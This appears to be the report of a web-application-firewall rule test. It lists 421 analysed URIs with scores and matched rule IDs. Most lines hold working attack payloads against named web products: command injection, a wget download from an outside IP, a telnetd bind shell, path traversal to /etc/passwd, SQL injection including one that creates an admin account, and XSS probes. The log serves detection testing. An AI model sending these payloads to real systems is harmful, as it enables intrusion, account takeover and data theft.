---------------------- Statistics of URIs analyzed------------------------
[421] input, [99] clean, [322] attacks
--------------------------- Analysis results -----------------------------
Packet [2]	Uri [/appliancews/getLicense?hostName=$(/usr/bin/wget%20http://1.1.1.1:12345/file%20-O%20/tmp/dsifnfnfdwsFFS)]	PLmin [3]	Score [20]	Nattacks [9]	[920273]	[932105]	[932130]	[932150]	[932160]	[942431]	[942432]	[949110]	[980130]
Packet [3]	Uri [/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../etc/passwd%00&Action=blast&hidenav=1]	PLmin [2]	Score [43]	Nattacks [12]	[920270]	[920271]	[920272]	[920273]	[930100]	[930110]	[930120]	[932160]	[942440]	[942460]	[949110]	[980130]
Packet [4]	Uri [/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../home/dna/spool/.pfile]	PLmin [3]	Score [15]	Nattacks [6]	[920273]	[930100]	[930110]	[942460]	[949110]	[980130]
Packet [5]	Uri [/ping.cgi?IPAddr1=12&IPAddr3=12&IPAddr2=12&ping=Ping&IPAddr4=12&ping_IPAddr=12.12.12.12%3B+cat%20/etc/passwd]	PLmin [4]	Score [15]	Nattacks [6]	[920273]	[930120]	[932100]	[932160]	[949110]	[980130]
Packet [6]	Uri [/ping.cgi?IPAddr1=12&IPAddr3=12&IPAddr2=12&ping=Ping&IPAddr4=12&ping_IPAddr=12.12.12.12%26+ls%20/etc/]	PLmin [4]	Score [5]	Nattacks [4]	[920273]	[932100]	[949110]	[980130]
Packet [8]	Uri [/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F1.1.1.1_pass_tshark.pcap%27--+-%22%3B%7D]	PLmin [2]	Score [5]	Nattacks [13]	[920273]	[942190]	[942260]	[942300]	[942370]	[942480]	[942430]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [10]	Uri [/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`]	PLmin [2]	Score [10]	Nattacks [8]	[920273]	[932105]	[932110]	[942110]	[942431]	[942432]	[949110]	[980130]
Packet [11]	Uri [/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[932100]	[942110]	[942432]	[949110]	[980130]
Packet [12]	Uri [/..//etc/passwd]	PLmin []	Score [5]	Nattacks [3]	[930100]	[949110]	[980130]
Packet [13]	Uri [/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperf-Mem&element=1%20AND%20SLEEP(5)]	PLmin [2]	Score [10]	Nattacks [10]	[920273]	[933161]	[942100]	[942160]	[942150]	[942300]	[942410]	[942432]	[949110]	[980130]
Packet [14]	Uri [/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserverMem&time_frame=1&element=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tayk)]	PLmin [2]	Score [10]	Nattacks [11]	[920273]	[933161]	[942100]	[942160]	[942150]	[942200]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [15]	Uri [/wizards/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5ctest.txt]	PLmin [3]	Score [10]	Nattacks [6]	[920273]	[930100]	[930110]	[942460]	[949110]	[980130]
Packet [16]	Uri [/search/members.json?id%60%3D-1%29%2f%2a%2a%2funion%2f%2a%2a%2fselect%2f%2a%2a%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cuser%28%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23balisong=1]	PLmin [4]	Score [10]	Nattacks [16]	[920273]	[942100]	[942190]	[942150]	[942180]	[942310]	[942370]	[942410]	[942480]	[942430]	[942440]	[942490]	[942431]	[942432]	[949110]	[980130]
Packet [17]	Uri [/fiyo/dapur/apps/app_article/controller/article_list.php?cat='%20orsleep(10)%20or%20'1&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1500268118960]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[942160]	[942110]	[942180]	[942432]	[949110]	[980130]
Packet [18]	Uri [/fiyo/dapur/apps/app_article/controller/article_status.php?fp=1&id=1'or'1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942330]	[942432]	[949110]	[980130]
Packet [19]	Uri [/fiyo/dapur/apps/app_article/controller/comment_status.php?stat=1&id=1'or'1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942330]	[942432]	[949110]	[980130]
Packet [20]	Uri [/fiyo/dapur/apps/app_comment/controller/comment_status.php?stat=1&id=1'or'1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942330]	[942432]	[949110]	[980130]
Packet [21]	Uri [/DesktopModules/C_Info/WebService/C_InfoService.asmx?SOAPAction:%20"https://tempuri.org/GetArticleHitsArray"%20<?xml%20version="1.0"%20encoding="utf-8"?>%20<soap:Envelope%20xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance"%20xmlns:xsd="https://www.w3.org/2001/XMLSchema"%20xmlns:soap="https://schemas.xmlsoap.org/soap/envelope/">%20<soap:Body>%20<GetArticleHitsArray%20xmlns="https://tempuri.org/">%20<ArticleIDs>aaa’</ArticleIDs>%20</GetArticleHitsArray>%20</soap:Body>%20</soap:Envelope>]	PLmin [3]	Score [15]	Nattacks [15]	[920272]	[920273]	[933190]	[941100]	[941130]	[941340]	[942110]	[942130]	[942430]	[942490]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [22]	Uri [/api/saveconfig?key=__import__(%27os%27).system(%27touch%20%2Ftmp%2Fpy100%20%26%27)&value=10&_=1496061368064]	PLmin [3]	Score [5]	Nattacks [7]	[920273]	[933160]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [24]	Uri [/wordpress/wp-admin/admin.php?page=SpiderCalendar&%20search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(2)))a)]	PLmin [2]	Score [5]	Nattacks [10]	[920273]	[933161]	[942160]	[942150]	[942200]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [25]	Uri [/wordpress/wp-admin/admin.php?page=SpiderCalendar&search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(30)))a)]	PLmin [2]	Score [5]	Nattacks [10]	[920273]	[933161]	[942160]	[942150]	[942200]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [26]	Uri [/Embedded_Ace_Set_Task.cgi?$'5003']	PLmin [2]	Score [0]	Nattacks [3]	[920273]	[942110]	[942432]
Packet [27]	Uri [/esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS%20UNION%20ALL%20SELECT%201%20and%201=1&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML]	PLmin [2]	Score [10]	Nattacks [9]	[920273]	[942100]	[942190]	[942130]	[942260]	[942400]	[942480]	[949110]	[980130]
Packet [29]	Uri [/set_mail.cgi?next_url=mail.htm&loginuse=admin&loginpas=%s&sender=a@a.com&receiver1=;telnetd$IFS-p4444$IFS-l/bin/sh&receiver2=&receiver3=&receiver4=&ssl=0&svr=smtp.google.com&smtpport=25&user=&pwd=]	PLmin [2]	Score [8]	Nattacks [9]	[920220]	[920230]	[920272]	[920273]	[932160]	[942110]	[942432]	[949110]	[980130]
Packet [32]	Uri [/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942390]	[949110]	[980130]
Packet [33]	Uri [/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942390]	[949110]	[980130]
Packet [34]	Uri [/wp-admin/admin-ajax.php?id=&action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[942100]	[942130]	[942390]	[942432]	[949110]	[980130]
Packet [35]	Uri [/source_selector.php?controller=blog&action=showall&src=@random4d4c8bfba590f'%2b(select*from(select(sleep(2)))a)%2b']	PLmin [2]	Score [10]	Nattacks [13]	[920273]	[933161]	[942100]	[942160]	[942110]	[942150]	[942200]	[942410]	[942430]	[942431]	[942432]	[949110]	[980130]
Packet [36]	Uri [/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute]	PLmin [2]	Score [5]	Nattacks [13]	[920273]	[932106]	[942100]	[942120]	[942260]	[942370]	[942430]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [38]	Uri [/actionphp/action.input.php?&ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1`%20WHERE%20SLEEP(5)--%20aaa%20&idForm=1234567890]	PLmin [2]	Score [5]	Nattacks [10]	[920273]	[933161]	[942160]	[942150]	[942410]	[942440]	[942460]	[942432]	[949110]	[980130]
Packet [39]	Uri [/actionphp/download.File.php?&file=../../../../../../etc/passwd]	PLmin [3]	Score [25]	Nattacks [8]	[920273]	[930100]	[930110]	[930120]	[932160]	[942460]	[949110]	[980130]
Packet [40]	Uri [/subrion/actions.json?action=delete-file&item=members&itemid=1&field=emailor%20sleep(3)%20,username&file=123]	PLmin [2]	Score [10]	Nattacks [10]	[920273]	[933161]	[942100]	[942160]	[942150]	[942300]	[942410]	[942432]	[949110]	[980130]
Packet [41]	Uri [/fiyo/apps/app_article/controller/editor.php?id="%20and%20sleep(10)&art_title=123]	PLmin [2]	Score [10]	Nattacks [13]	[920273]	[933161]	[942100]	[942160]	[942110]	[942150]	[942180]	[942300]	[942370]	[942410]	[942432]	[949110]	[980130]
Packet [42]	Uri [/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php?<?php%20echo(pi());]	PLmin [2]	Score [5]	Nattacks [9]	[920273]	[933100]	[933161]	[942150]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [43]	Uri [/commit2.cgi?ADMIN_PASSWD=$1$ZZ0DVlc6$QLqFLzW8YDZObgHtMZrYF/]	PLmin [4]	Score [0]	Nattacks [2]	[920273]	[942432]
Packet [44]	Uri [/home/seos/courier/login.html?auth_params=x%0Dnew:header]	PLmin [2]	Score [0]	Nattacks [3]	[920272]	[920273]	[921151]
Packet [45]	Uri [/seos/1000/find.api?method=x%27%60id>/tmp/zz%60%27&oauth_token=b]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[932100]	[942110]	[942260]	[942432]	[949110]	[980130]
Packet [47]	Uri [/hitehat-fta.accellion.net/courier/1000@/index.html?auth=oauth&auth_params=asdf%22%3E%20%3Cimg%20src%3Dx%20onerror%3Dalert(%27alert%60xss%60%27)%2F%2F%3E]	PLmin [2]	Score [15]	Nattacks [14]	[920273]	[941100]	[941120]	[941160]	[941150]	[941320]	[941330]	[942340]	[942430]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [50]	Uri [/gwadmin-console/install/login.jsp?token=asdf%22%2balert%28%27xss%27%29%2b%22]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[942100]	[942110]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [53]	Uri [/responder.fcgi1?winid=106&winname=Users%20%26%20Groups&slot=1&mainslot=1]	PLmin [4]	Score [0]	Nattacks [1]	[920273]
Packet [54]	Uri [/responder.fcgi1?winid=109&winname=Users%20%26%20Groups&slot=1&mainslot=1]	PLmin [4]	Score [0]	Nattacks [1]	[920273]
Packet [55]	Uri [/responder.fcgi1?winid=103&winname=Users%20%26%20Groups&slot=1&mainslot=1]	PLmin [4]	Score [0]	Nattacks [1]	[920273]
Packet [56]	Uri [/responder.fcgi0?winid=89&winname=Users%20%26%20Groups&slot=0]	PLmin [4]	Score [0]	Nattacks [1]	[920273]
Packet [59]	Uri [/web/google_analytics.php?cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23]	PLmin [2]	Score [10]	Nattacks [7]	[920273]	[932100]	[932110]	[942300]	[942432]	[949110]	[980130]
Packet [61]	Uri [/_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4a69e249c1d0ab9772763f3c97e69_/%3fs%3dmain&action=submit&origin=%2F_45b4a69e249c1d0ab9772763f3c97e69_%2F%3Fs%3Dmain&s=login&user=admin%27+or+%271%27%3D%271+--%2B&password=asd]	PLmin [2]	Score [10]	Nattacks [16]	[920273]	[921180]	[932190]	[942100]	[942130]	[942180]	[942330]	[942340]	[942370]	[942390]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [62]	Uri [/FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0)]	PLmin [2]	Score [10]	Nattacks [10]	[920273]	[933161]	[942100]	[942160]	[942150]	[942300]	[942410]	[942432]	[949110]	[980130]
Packet [64]	Uri [/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=related%20module=news%20tag=1%20field=1%0aunion%0aselect%0auser()%23]	PLmin [2]	Score [10]	Nattacks [13]	[920272]	[920273]	[921151]	[932115]	[942190]	[942150]	[942260]	[942410]	[942480]	[942431]	[942432]	[949110]	[980130]
Packet [65]	Uri [/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=module%20form=1%20module=news%20field=1%0aunion%0aselect%0auser()%23]	PLmin [2]	Score [10]	Nattacks [13]	[920272]	[920273]	[921151]	[932115]	[942190]	[942150]	[942260]	[942410]	[942480]	[942431]	[942432]	[949110]	[980130]
Packet [66]	Uri [/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=form%20form=1%20field=1%0aunion%0aselect%0auser()%23]	PLmin [2]	Score [10]	Nattacks [13]	[920272]	[920273]	[921151]	[932115]	[942190]	[942150]	[942260]	[942410]	[942480]	[942431]	[942432]	[949110]	[980130]
Packet [67]	Uri [/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=member%20field=1%0aunion%0aselect%0auser()%23]	PLmin [2]	Score [10]	Nattacks [12]	[920272]	[920273]	[921151]	[932115]	[942190]	[942150]	[942260]	[942410]	[942480]	[942432]	[949110]	[980130]
Packet [69]	Uri [/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=related%20catid=1%20tag=1,2%20num=1/**/PROCEDURE/**/analyse(extractvalue(rand(),concat(0x3a,version())),1)]	PLmin [2]	Score [0]	Nattacks [10]	[920273]	[932190]	[933161]	[942150]	[942410]	[942430]	[942440]	[942431]	[942460]	[942432]
Packet [70]	Uri [/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=tags%20catid=1%20tag=1,2%20num=1/**/PROCEDURE/**/analyse(extractvalue(rand(),concat(0x3a,version())),1)]	PLmin [2]	Score [0]	Nattacks [10]	[920273]	[932190]	[933161]	[942150]	[942410]	[942430]	[942440]	[942431]	[942460]	[942432]
Packet [72]	Uri [/index.php?c=weixin&m=sync&url=http://www.baidu.com]	PLmin [2]	Score [0]	Nattacks [2]	[920273]	[931130]
Packet [73]	Uri [/fiyo/apps/app_comment/controller/insert.php?send=true&name=1"%20or%20sleep(10)%20or%20"1&email=aaa@qq.com&url=11&text=11111&captcha=undefined&link=%3Fapp%3Darticle%26view%3Ditem%26id%3D184]	PLmin [2]	Score [10]	Nattacks [12]	[920273]	[933161]	[942100]	[942160]	[942150]	[942180]	[942300]	[942370]	[942410]	[942432]	[949110]	[980130]
Packet [74]	Uri [/fiyo/dapur/index.php?app=article&view=tag&act=edit&id=79&apply_tag=Simpan&id=79&name=1%22or%221&desc=1]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[921180]	[942100]	[942330]	[942432]	[949110]	[980130]
Packet [75]	Uri [/piwigo/admin.php?page=cat_options&section=status&cat_false%5B%5D=755&trueify=%C2%AB]	PLmin [3]	Score [0]	Nattacks [3]	[920272]	[920273]	[942432]
Packet [76]	Uri [/piwigo/admin.php?page=cat_options&section=comments?cat_true%5B%5D=7*55&falsify=%C2%BB]	PLmin [3]	Score [0]	Nattacks [3]	[920272]	[920273]	[942432]
Packet [77]	Uri [/piwigo/admin.php?page=cat_options&section=comments&cat_true%5B%5D=7*55&falsify=%C2%BB]	PLmin [3]	Score [0]	Nattacks [3]	[920272]	[920273]	[942432]
Packet [78]	Uri [/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E]	PLmin [2]	Score [15]	Nattacks [10]	[920273]	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]	[942432]	[949110]	[980130]
Packet [80]	Uri [/websitebaker/account/preferences.php?action=details&display_name=24444'%20union%20select%20sleep(6)%23]	PLmin [2]	Score [25]	Nattacks [15]	[920273]	[933161]	[942100]	[942160]	[942170]	[942190]	[942360]	[942150]	[942260]	[942361]	[942410]	[942480]	[942432]	[949110]	[980130]
Packet [84]	Uri [/doli/theme/eldy/style.css.php?lang=de%27%20procedure%20analyse(extractvalue(rand()%2cconcat(concat(0x3a,CURRENT_USER())))%2c1)--%201]	PLmin [2]	Score [15]	Nattacks [14]	[920273]	[933161]	[942100]	[942190]	[942320]	[942150]	[942410]	[942430]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [85]	Uri [/theme/eldy/style.css.php?lang=de%27%3BINSERT%20INTO%20llx_user%20VALUES%20(424242%2C%200%2C%20NULL%2C%20NULL%2C%201%2C%200%2C%20%271984-01-01%2000%3A00%3A00%27%2C%20%271984-01-01%2000%3A00%3A00.000%27%2C%20NULL%2C%20NULL%2C%20%27newadmin%27%2C%20NULL%2C%20%2761529519452809720693702583126814%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%20%27SuperAdmin%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%201%2C%201%2C%201%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%272017-03-10%2000%3A00%3A00%27%2C%20%272017-03-10%2000%3A00%3A00%27%2C%20NULL%2C%20%27%27%2C%20NULL%2C%201%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%200%2C%20%27%27%2C%200%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL)%3B--%27]	PLmin [4]	Score [10]	Nattacks [19]	[920273]	[942100]	[942350]	[942110]	[942150]	[942200]	[942210]	[942330]	[942370]	[942410]	[942480]	[942430]	[942440]	[942490]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [86]	Uri [/doli/societe/list.php?sall=asd%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E]	PLmin [2]	Score [15]	Nattacks [12]	[920273]	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [92]	Uri [/photostore/manager/mgr.login.php?pmode=recover_login&email=%27%201%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942110]	[942130]	[942400]	[942432]
Packet [94]	Uri [/zm/index.php?view=request&request=log&task=download&key=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C/body%3E%3C/html%3Eayn2h]	PLmin [2]	Score [20]	Nattacks [13]	[920273]	[921130]	[941100]	[941110]	[941160]	[941320]	[942130]	[942260]	[942430]	[942431]	[942432]	[949110]	[980130]
Packet [95]	Uri [/zm/index.php/LSE4%22%3E%3Cscript%3Ealert(1)%3C/script%3ELSE]	PLmin []	Score [5]	Nattacks [3]	[941110]	[949110]	[980130]
Packet [97]	Uri [/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or-sleep(5)/*&customers_status=*/%23]	PLmin [2]	Score [10]	Nattacks [11]	[920273]	[933161]	[942100]	[942160]	[942150]	[942410]	[942440]	[942431]	[942432]	[949110]	[980130]
Packet [98]	Uri [/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or(Select(case(36)when(ascii(substring(`customers_password`FROM(1)FOR(1))))then-sleep(5)End)from`customers`where`customers_id`=1)/*&customers_status=*/%23]	PLmin [2]	Score [15]	Nattacks [19]	[920273]	[933161]	[942100]	[942160]	[942230]	[942150]	[942200]	[942310]	[942370]	[942380]	[942410]	[942480]	[942430]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [99]	Uri [/index.php?controller=address&action=activate_address&id=1%20and%20if(1,sleep(1),0)%23]	PLmin [2]	Score [10]	Nattacks [10]	[920273]	[933161]	[942100]	[942160]	[942150]	[942300]	[942410]	[942432]	[949110]	[980130]
Packet [100]	Uri [/index.php?controller=blog&action=show&title=xx'%20union%20select1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[942190]	[942150]	[942410]	[942432]	[949110]	[980130]
Packet [104]	Uri [/index.php'%20OR%20SLEEP(1)--%20]	PLmin [3]	Score [0]	Nattacks [1]	[933161]
Packet [105]	Uri [/index.php'%20OR%20SLEEP(30)--%20]	PLmin [3]	Score [0]	Nattacks [1]	[933161]
Packet [106]	Uri [/genixcms0.0.8/index.php?page=modules&act=activate&token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm&modules=aa%27%20and%20%28select%20*%20from%20%28select%28if%28ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%3D114%2Csleep%282%29%2C0%29%29%29a%29%20or%20%27a%27%3D%27a]	PLmin [2]	Score [15]	Nattacks [19]	[920273]	[933161]	[942100]	[942160]	[942190]	[942130]	[942150]	[942180]	[942200]	[942310]	[942370]	[942390]	[942410]	[942430]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [107]	Uri [/GeniXCMS/register.php?activation=1'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(version(),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%23]	PLmin [2]	Score [15]	Nattacks [18]	[920273]	[933161]	[942100]	[942140]	[942190]	[942150]	[942200]	[942310]	[942330]	[942370]	[942410]	[942480]	[942430]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [108]	Uri [/GeniXCMS/?author=user1&type=hi%27%20OR%20(SELECT%201431%20FROM(SELECT%20COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20bPMf]	PLmin [2]	Score [15]	Nattacks [19]	[920273]	[933161]	[942100]	[942140]	[942190]	[942150]	[942200]	[942310]	[942330]	[942370]	[942410]	[942480]	[942430]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [109]	Uri [/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp?action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=&zipcode=&uemail=john.doe@test.com';WAITFOR%20DELAY%20'0:0:5'--&upphone=0&umobileno=]	PLmin [2]	Score [20]	Nattacks [12]	[920273]	[932115]	[942100]	[942240]	[942280]	[942300]	[942440]	[942490]	[942431]	[942432]	[949110]	[980130]
Packet [111]	Uri [/api/content/save/1?address1=e&address2=e&city=e&contactMe=false&email=sample%40email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=-1'%20OR%203_2_1=6%20AND%2000053=00053%20or%20'cFbN0pEu'=']	PLmin [2]	Score [0]	Nattacks [10]	[920273]	[942110]	[942130]	[942180]	[942330]	[942340]	[942390]	[942400]	[942431]	[942432]
Packet [112]	Uri [/api/content/save/1?address1=e&address2=e&city=e&contactMe=false&email=sample@email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus'%20AND%206745=6745%20AND%20'ajDn'='ajDn]	PLmin [2]	Score [5]	Nattacks [11]	[920273]	[942100]	[942130]	[942180]	[942330]	[942340]	[942400]	[942431]	[942432]	[949110]	[980130]
Packet [113]	Uri [/expComment/showComments/content_id/11%20or%20sleep(10)]	PLmin [3]	Score [0]	Nattacks [1]	[933161]
Packet [114]	Uri [/categoriesServlet?start=0&count=10&sort=keywords%20LIMIT%20(SELECT%20CASE%20WHEN%20(1=1)%20THEN%201%20ELSE%20-1%20END)]	PLmin [2]	Score [0]	Nattacks [6]	[920273]	[942130]	[942310]	[942380]	[942431]	[942432]
Packet [115]	Uri [/categoriesServlet?start=0&count=10&sort=keywords%20LIMIT%20(SELECT%20CASE%20WHEN%20(1=0)%20THEN%201%20ELSE%20-1%20END)]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942310]	[942380]	[942431]	[942432]
Packet [116]	Uri [/exponent/action=manage_ranks&controller=container&lastpage=http://8.8.8.8/exponent//exponent/&model=container&rerank%5b%5d=16&src=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/]	PLmin []	Score [0]	Nattacks [1]	[933161]
Packet [117]	Uri [/index.php?controller=pixidou&action=exitEditor&exitType=saveAsIs&fid=-1&apos;union%20select1,'./','evil.php',4,5,6,7,8,9,0,1,2,3,4,5%23&cpi=../../../../../../../../etc/passwd]	PLmin [2]	Score [35]	Nattacks [13]	[920273]	[930100]	[930110]	[930120]	[932160]	[942190]	[942370]	[942490]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [118]	Uri [/index.php?controller=pixidou&action=exitEditor&exitType=saveAsIs&fid=-1&apos;union%20select1,'./','1.txt',4,5,6,7,8,9,0,1,2,3,4,5%23&cpi=../../framework/conf/config.php]	PLmin [2]	Score [30]	Nattacks [12]	[920273]	[930100]	[930110]	[930120]	[942190]	[942370]	[942490]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [120]	Uri [/modtask.php?action=confirmuser&userid=(select*from(select%20sleep(10))x)]	PLmin [2]	Score [20]	Nattacks [14]	[920273]	[933161]	[942100]	[942160]	[942170]	[942360]	[942150]	[942200]	[942310]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [121]	Uri [/massmail.php?class=666&or=<(select*from(select%20sleep(10))x)%23]	PLmin [2]	Score [20]	Nattacks [14]	[920273]	[932130]	[933161]	[942160]	[942170]	[942360]	[942150]	[942200]	[942310]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [124]	Uri [/wp-content/plugins/filedownload/download.php?path=http://www.google.com]	PLmin [2]	Score [0]	Nattacks [2]	[920273]	[931130]
Packet [127]	Uri [/courier/B3dKe9sQaa0L.log]	PLmin []	Score [5]	Nattacks [3]	[920440]	[949110]	[980130]
